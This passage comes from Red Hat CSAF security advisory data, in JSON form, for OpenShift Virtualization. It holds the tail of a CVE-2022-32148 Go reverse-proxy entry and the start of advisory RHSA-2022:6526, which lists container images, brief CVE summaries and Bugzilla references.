"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107383" } ], "notes": [ { "category": "description", "text": "A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-32148" }, { "category": "external", "summary": "RHBZ#2107383", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-32148", "url": "https://www.cve.org/CVERecord?id=CVE-2022-32148" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32148" }, { "category": "external", "summary": "https://go.dev/issue/53423", "url": "https://go.dev/issue/53423" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working" } ] }
rhsa-2022_6526
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "OpenShift Virtualization is Red Hat\u0027s virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.11.0 images:\n\nRHEL-8-CNV-4.11\n===============\nhostpath-provisioner-container-v4.11.0-21\nkubevirt-tekton-tasks-operator-container-v4.11.0-29\nkubevirt-template-validator-container-v4.11.0-17\nbridge-marker-container-v4.11.0-26\nhostpath-csi-driver-container-v4.11.0-21\ncluster-network-addons-operator-container-v4.11.0-26\novs-cni-marker-container-v4.11.0-26\nvirtio-win-container-v4.11.0-16\novs-cni-plugin-container-v4.11.0-26\nkubemacpool-container-v4.11.0-26\nhostpath-provisioner-operator-container-v4.11.0-24\ncnv-containernetworking-plugins-container-v4.11.0-26\nkubevirt-ssp-operator-container-v4.11.0-54\nvirt-cdi-uploadserver-container-v4.11.0-59\nvirt-cdi-cloner-container-v4.11.0-59\nvirt-cdi-operator-container-v4.11.0-59\nvirt-cdi-importer-container-v4.11.0-59\nvirt-cdi-uploadproxy-container-v4.11.0-59\nvirt-cdi-controller-container-v4.11.0-59\nvirt-cdi-apiserver-container-v4.11.0-59\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.0-7\ncheckup-framework-container-v4.11.0-67\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7\nvm-network-latency-checkup-container-v4.11.0-67\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7\nhyperconverged-cluster-webhook-container-v4.11.0-95\ncnv-must-gather-container-v4.11.0-62\nhyperconverged-cluster-operator-container-v4.11.0-95\nkubevirt-console-plugin-container-v4.11.0-83\nvirt-controller-container-v4.11.0-105\nvirt-handler-container-v4.11.0-105\nvirt-operator-container-v4.11.0-105\nvirt-launcher-container-v4.11.0-105\nvirt-artifacts-server-container-v4.11.0-105\nvirt-api-container-v4.11.0-105\nlibguestfs-tools-container-v4.11.0-105\nhco-bundle-registry-container-v4.11.0-587\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)\n\n* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:6526", "url": "https://access.redhat.com/errata/RHSA-2022:6526" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "1937609", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937609" }, { "category": "external", "summary": "1945593", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945593" }, { "category": "external", "summary": "1968514", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1968514" }, { "category": "external", "summary": "1993109", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993109" }, { "category": "external", "summary": "1994604", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1994604" }, { "category": "external", "summary": "2001385", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2001385" }, { "category": "external", "summary": "2009793", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2009793" }, { "category": "external", "summary": "2010318", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2010318" }, { "category": "external", "summary": "2025276", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2025276" }, { "category": "external", "summary": "2025401", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2025401" }, { "category": "external", "summary": "2026357", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2026357" }, { "category": "external", "summary": "2029349", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2029349" }, { "category": "external", "summary": "2030801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801" }, { "category": "external", "summary": "2030806", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806" }, { "category": "external", "summary": "2031857", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031857" }, { "category": "external", "summary": "2033077", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033077" }, { "category": "external", "summary": "2035344", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035344" }, { "category": "external", "summary": "2036676", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2036676" }, { "category": "external", "summary": "2039976", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2039976" }, { "category": "external", "summary": "2040766", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2040766" }, { "category": "external", "summary": "2041467", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2041467" }, { "category": "external", "summary": "2042402", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2042402" }, { "category": "external", "summary": "2042809", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2042809" }, { "category": "external", "summary": "2045086", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045086" }, { "category": "external", "summary": "2045880", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880" }, { "category": "external", "summary": "2047186", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047186" }, { "category": "external", "summary": "2051899", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2051899" }, { "category": "external", "summary": "2052094", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052094" }, { "category": "external", "summary": "2052466", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052466" }, { "category": "external", "summary": "2052689", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052689" }, { "category": "external", "summary": "2053429", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429" }, { "category": "external", "summary": "2053532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532" }, { "category": "external", "summary": "2053541", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541" }, { "category": "external", "summary": "2056467", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2056467" }, { "category": "external", "summary": "2057157", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2057157" }, { "category": "external", "summary": "2057310", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2057310" }, { "category": "external", "summary": "2058149", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2058149" }, { "category": "external", "summary": "2058925", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2058925" }, { "category": "external", "summary": "2059121", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2059121" }, { "category": "external", "summary": "2060485", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060485" }, { "category": "external", "summary": "2060585", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060585" }, { "category": "external", "summary": "2061208", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2061208" }, { "category": "external", "summary": "2061723", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2061723" }, { "category": "external", "summary": "2063540", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2063540" }, { "category": "external", "summary": "2063792", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2063792" }, { "category": "external", "summary": "2064034", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064034" }, { "category": "external", "summary": "2064702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064702" }, { "category": "external", "summary": "2064857", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064857" }, { "category": "external", "summary": "2064936", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064936" }, { "category": "external", "summary": "2065014", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2065014" }, { "category": "external", "summary": "2065019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2065019" }, { "category": "external", "summary": "2066768", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2066768" }, { "category": "external", "summary": "2067246", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067246" }, { "category": "external", "summary": "2069287", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069287" }, { "category": "external", "summary": "2069388", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069388" }, { "category": "external", "summary": "2070366", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070366" }, { "category": "external", "summary": "2070864", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070864" }, { "category": "external", "summary": "2071488", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071488" }, { "category": "external", "summary": "2071549", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071549" }, { "category": "external", "summary": "2071611", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071611" }, { "category": "external", "summary": "2071921", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071921" }, { "category": "external", "summary": "2073669", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073669" }, { "category": "external", "summary": "2073679", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073679" }, { "category": "external", "summary": "2073982", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073982" }, { "category": "external", "summary": "2074337", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2074337" }, { "category": "external", "summary": "2075200", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2075200" }, { "category": "external", "summary": "2075409", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2075409" }, { "category": "external", "summary": "2076292", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076292" }, { "category": "external", "summary": "2076379", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076379" }, { "category": "external", "summary": "2076790", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076790" }, { "category": "external", "summary": "2076908", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076908" }, { "category": "external", "summary": "2077688", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077688" }, { "category": "external", "summary": "2077689", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077689" }, { "category": "external", "summary": "2078700", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078700" }, { "category": "external", "summary": "2078703", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078703" }, { "category": "external", "summary": "2078709", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078709" }, { "category": "external", "summary": "2078728", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078728" }, { "category": "external", "summary": "2079366", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079366" }, { "category": "external", "summary": "2079674", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079674" }, { "category": "external", "summary": "2079783", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079783" }, { "category": "external", "summary": "2080132", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080132" }, { "category": "external", "summary": "2080155", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080155" }, { "category": "external", "summary": "2080547", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080547" }, { "category": "external", "summary": "2080833", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080833" }, { "category": "external", "summary": "2080835", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080835" }, { "category": "external", "summary": "2081182", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081182" }, { "category": "external", "summary": "2081202", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081202" }, { "category": "external", "summary": "2081409", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081409" }, { "category": "external", "summary": "2081671", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081671" }, { "category": "external", "summary": "2081831", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081831" }, { "category": "external", "summary": "2082008", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2082008" }, { "category": "external", "summary": "2082164", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2082164" }, { "category": "external", "summary": "2082912", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2082912" }, { "category": "external", "summary": "2083093", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083093" }, { "category": "external", "summary": "2083097", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083097" }, { "category": "external", "summary": "2083100", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083100" }, { "category": "external", "summary": "2083101", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083101" }, { "category": "external", "summary": "2083135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083135" }, { "category": "external", "summary": "2083256", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083256" }, { "category": "external", "summary": "2083595", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083595" }, { "category": "external", "summary": "2084102", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084102" }, { "category": "external", "summary": "2084122", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084122" }, { "category": "external", "summary": "2084418", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084418" }, { "category": "external", "summary": "2084431", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084431" }, { "category": "external", "summary": "2084476", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084476" }, { "category": "external", "summary": "2084532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084532" }, { "category": "external", "summary": "2084610", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084610" }, { "category": "external", "summary": "2085320", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2085320" }, { "category": "external", "summary": "2085322", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2085322" }, { "category": "external", "summary": "2086272", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086272" }, { "category": "external", "summary": "2086278", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086278" }, { "category": "external", "summary": "2086281", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086281" }, { "category": "external", "summary": "2086286", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086286" }, { "category": "external", "summary": "2086293", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086293" }, { "category": "external", "summary": "2086294", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086294" }, { "category": "external", "summary": "2086303", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086303" }, { "category": "external", "summary": "2086479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086479" }, { "category": "external", "summary": "2086486", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086486" }, { "category": "external", "summary": "2086488", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086488" }, { "category": "external", "summary": "2086769", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086769" }, { "category": "external", "summary": "2086803", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086803" }, { "category": "external", "summary": "2086825", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086825" }, { "category": "external", "summary": "2086849", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086849" }, { "category": "external", "summary": "2087188", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087188" }, { "category": "external", "summary": "2087189", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087189" }, { "category": "external", "summary": "2087232", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087232" }, { "category": "external", "summary": "2087546", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087546" }, { "category": "external", "summary": "2087547", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087547" }, { "category": "external", "summary": "2087559", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087559" }, { "category": "external", "summary": "2087566", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087566" }, { "category": "external", "summary": "2087570", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087570" }, { "category": "external", "summary": "2087577", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087577" }, { "category": "external", "summary": "2087578", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087578" }, { "category": "external", "summary": "2087582", "url": 